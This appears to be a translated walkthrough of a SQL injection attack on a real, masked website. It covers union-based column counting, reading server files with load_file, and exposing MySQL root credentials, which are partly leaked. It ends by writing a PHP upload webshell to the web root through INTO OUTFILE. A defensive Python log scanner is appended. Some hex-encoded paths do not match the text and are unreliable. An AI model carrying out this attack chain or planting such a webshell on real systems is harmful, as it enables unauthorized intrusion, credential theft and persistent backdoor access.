The test site is as follows:
http://www.******.com
Find an injection point:
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830
Submit a single quote after the id.
Returned results
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154
The physical path is disclosed; the check continues.
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830' and 1=1 #
An error is returned, so the parameter is not of string type.
Note: %23 is #
Submitting and 1=1 returns normal.
Submitting and 1=2 returns abnormal.
Next, the union statements.
and 1=1 union select 1 returns abnormal
and 1=1 union select 1, 2 returns abnormal
and 1=1 union select 1, 2, 3 returns abnormal
and 1=1 union select 1, 2, 3, 4 returns abnormal
and 1=1 union select 1, 2, 3, 4, 5 returns abnormal
and 1=1 union select 1, 2, 3, 4, 5, 6 returns abnormal
and 1=1 union select 1, 2, 4, 5, 6, 7 returns abnormal
and 1=1 union select 1, 2, 3, 4, 5, 6, 7, 8 returns abnormal
and 1=1 union select 1, 2, 3, 4, 5, 6, 7, 8, 9 returns abnormal
and 1=1 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 returns abnormal
and 1=1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11 returns abnormal
and 1=1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12 returns abnormal
and 1=1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 returns abnormal
and 1=1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 returns normal
It returns normal at 14, so the column count is found; continue with the next step.
Usually the admin backend of a site like this cannot be found..
Let's have a look anyway..
Guess common paths:
login.php
admin.php
admin_login.php
admin_index.php
admin/login.php
admin/admin.php
admin/admin_login.php
admin/admin_index.php
manage/index.php
manage/login.php
manage/admin_login.php
manage/admin_index.php
And so on. If you have the patience you can keep guessing slowly, but even if you guess it, it is of no use.
Let's use a direct method: use load_file to read the file content directly.
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
Change and 1=1 to and 1=2.
The returned result is:
2
Position 2 is displayed on the page, so the file content we want can be read out through it.
The file is /var/www/html/zhaobiao/zhaobiao_hy_show.php.
Use load_file(/var/www/html/zhaobiao/zhaobiao_hy_show.php) directly.
The precondition is to convert /var/www/html/zhaobiao/zhaobiao_hy_show.php to hexadecimal.
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1, load_file(Bytes 686F772E706870), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
Returned result:
0 or $regdate > mysql_result($query, 0, yxdate) { ?>
", mysql_result($query, 0, sm); ?>
Never mind that. Looking at the page source reveals an inc.php file; combined with the path found earlier:
/var/www/html/inc.php
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1, load_file(0x2f7661722f77772f68746d6c2f696e632e706870), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
The result is disclosed but not visible in the rendered page, so view the page source directly:
<?
$myconn = mysql_connect("localhost", "root", "www.******.comy0p5h1i0");
mysql_select_db("mlk");
?>
The MySQL root credentials are exposed..
The next step is to log on to MySQL and insert the prepared small webshell..
use mlk;
create table mmxy (cmd TEXT);
insert into mmxy values (<?php);
insert into mmxy values ($msg = copy($_FILES[MyFile][tmp_name], $_FILES[MyFile][name]) ? "Successful" : "failure";);
insert into mmxy values (echo $msg;);
insert into mmxy values (?>);
insert into mmxy values (<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">);
insert into mmxy values (<input NAME="MyFile" TYPE="file">);
insert into mmxy values (<input VALUE="Up" TYPE="submit"></form>);
select * from mmxy into outfile /var/www/html/zhaobiao/mmxy.php;
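As an added defensive example (not part of the original writeup), the following Python scans web-server access logs for the stages used above: the and 1=1 / and 1=2 probe, UNION SELECT column counting, load_file() with a hex-encoded path (decoded so the targeted file is visible), and INTO OUTFILE. The log lines, timestamps and client address are constructed; the signatures and the log format are assumptions, not anything from the site described.

```python
import re
from urllib.parse import unquote_plus
# Constructed sample access-log lines (not from the original post), mirroring the writeup's stages.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /zhaobiao/zhaobiao_hy_show.php?id=149830%20and%201=2%20union%20select%201,2,3 HTTP/1.1" 200 4100
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /zhaobiao/zhaobiao_hy_show.php?id=149830%20and%201=2%20union%20select%201,load_file(0x2f7661722f7777772f68746d6c2f696e632e706870),3 HTTP/1.1" 200 6000
10.0.0.5 - - [01/Jan/2024:10:00:31 +0000] "GET /zhaobiao/zhaobiao_hy_show.php?id=1%20union%20select%201%20into%20outfile%20'/var/www/html/x.php' HTTP/1.1" 200 100
"""
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
SIGNATURES = {  # applied to the URL-decoded, lower-cased query string
    "boolean-probe": re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "load_file": re.compile(r"\bload_file\s*\("),
    "into-outfile": re.compile(r"\binto\s+(?:out|dump)file\b"),
}
HEX_LITERAL_RE = re.compile(r"0x([0-9a-f]{2,})")

def decode_hex(h):
    """Decode one MySQL 0x... literal; None if it is not valid UTF-8 text."""
    try:
        return bytes.fromhex(h).decode("utf-8")
    except ValueError:  # odd-length hex or non-text bytes (UnicodeDecodeError is a ValueError)
        return None

def union_column_count(query):
    """Count the UNION SELECT list (commas at paren depth 0) to spot column probing."""
    m = SIGNATURES["union-select"].search(query)
    if not m:
        return None
    depth, count = 0, 1
    for ch in re.split(r"\s+(?:from|into|where)\b", query[m.end():], maxsplit=1)[0]:
        depth += (ch == "(") - (ch == ")")
        count += ch == "," and depth == 0
    return count

def analyze_query(raw_query):
    """Normalize one query string and report which injection stages it matches."""
    q = unquote_plus(raw_query).lower()
    tags = [n for n, rx in SIGNATURES.items() if rx.search(q)]
    files = [t for t in map(decode_hex, HEX_LITERAL_RE.findall(q)) if t]
    return {"tags": tags, "columns": union_column_count(q), "files": files}

def scan_log(text):
    """Return one finding per request whose query string matches a signature."""
    findings = []
    for m in filter(None, map(REQUEST_RE.match, text.splitlines())):
        path, _, query = m.group(2).partition("?")
        r = analyze_query(query)
        if r["tags"]:
            findings.append({"client": m.group(1), "path": path, **r})
    return findings
```

Run against real logs, a rising column count from one client followed by a load_file or into outfile hit is the sequence worth alerting on; the decoded path shows which file the attacker read.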